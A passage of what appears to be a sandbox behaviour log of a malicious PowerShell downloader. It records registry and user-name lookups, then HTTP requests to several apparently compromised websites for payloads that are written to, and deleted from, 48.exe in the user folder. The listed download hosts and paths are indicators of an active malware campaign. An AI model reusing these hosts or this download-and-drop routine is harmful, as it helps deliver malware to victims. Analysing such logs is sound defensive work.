| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 |
Thread 0xb70
54
12
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xb90
119
212
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
25 | |
| Environment | Get Environment String | name = userprofile, result_out = C:\Users\aETAdzjz |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
5 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\48.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Mutex | Release | - |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = lesserassociates.com, address_out = 192.115.76.18 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| System | Get Network Adapter Info | - |
|
1 | |
| System | Get Network Adapter Info | - |
|
1 | |
| Socket | Connect | remote_address = 192.115.76.18, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 85, size_out = 85 |
|
1 | |
| Inet | Open Session | - |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = lesserassociates.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/E8h/ |
|
1 | |
| Inet | Send HTTP Request | headers = Host: lesserassociates.com, Connection: Keep-Alive, url = lesserassociates.com/wp-content/E8h/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 582, size_out = 582 |
|
1 | |
| Inet | Read Response | size = 582, size_out = 582 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 278 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 278 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 746, size_out = 746 |
|
1 | |
| Inet | Read Response | size = 746, size_out = 746 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 554 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 554 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1024, size_out = 1024 |
|
1 | |
| Inet | Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 738, size_out = 738 |
|
1 | |
| Inet | Read Response | size = 738, size_out = 738 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\48.exe |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\48.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_type |
|
2 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = forexproservice.com, address_out = 80.172.234.15 |
|
1 | |
| Socket | Connect | remote_address = 80.172.234.15, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 83, size_out = 83 |
|
1 | |
| Inet | Open Session | - |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = forexproservice.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/tW/ |
|
1 | |
| Inet | Send HTTP Request | headers = Host: forexproservice.com, Connection: Keep-Alive, url = forexproservice.com/wp-content/tW/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 499 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 499 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = host-services.com, address_out = 194.8.30.20 |
|
1 | |
| Socket | Connect | remote_address = 194.8.30.20, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 77, size_out = 77 |
|
1 | |
| Inet | Open Session | - |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = host-services.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /suspended/ |
|
1 | |
| Inet | Send HTTP Request | headers = Host: host-services.com, Connection: Keep-Alive, url = host-services.com/suspended/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 278 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 278 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1492, size_out = 1492 |
|
1 | |
| Inet | Read Response | size = 1492, size_out = 1492 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\48.exe, size = 1492 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\48.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_type |
|
2 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = nieuwhoftegelwerken.nl, address_out = 195.8.208.98 |
|
1 | |
| Socket | Connect | remote_address = 195.8.208.98, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 79, size_out = 79 |
|
1 | |
| Inet | Open Session | - |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = nieuwhoftegelwerken.nl, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /g9A/Wj/ |
|
1 | |
| Inet | Send HTTP Request | headers = Host: nieuwhoftegelwerken.nl, Connection: Keep-Alive, url = nieuwhoftegelwerken.nl/g9A/Wj/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 947, size_out = 947 |
|
1 | |
| Inet | Read Response | size = 947, size_out = 947 |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\48.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\48.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_type |
|
2 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = uninortediverso.com, address_out = 104.31.93.251, 104.31.92.251 |
|
1 | |
| Socket | Connect | remote_address = 104.31.93.251, remote_port = 443 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 123, size_out = 123 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 87, size_out = 87 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4242, size_out = 4242 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 146, size_out = 146 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 134, size_out = 134 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| System | Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 117, size_out = 117 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 640, size_out = 640 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 32, size_out = 32 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\48.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\48.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\48.exe, type = file_type |
|
2 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = vigor-dragon.com, address_out = 47.89.211.238 |
|
1 | |
| Socket | Connect | remote_address = 47.89.211.238, remote_port = 443 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 120, size_out = 120 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 0 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 47.89.211.238, remote_port = 443 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 120, size_out = 120 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5, size_out = 0 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\48.exe |
|
1 |
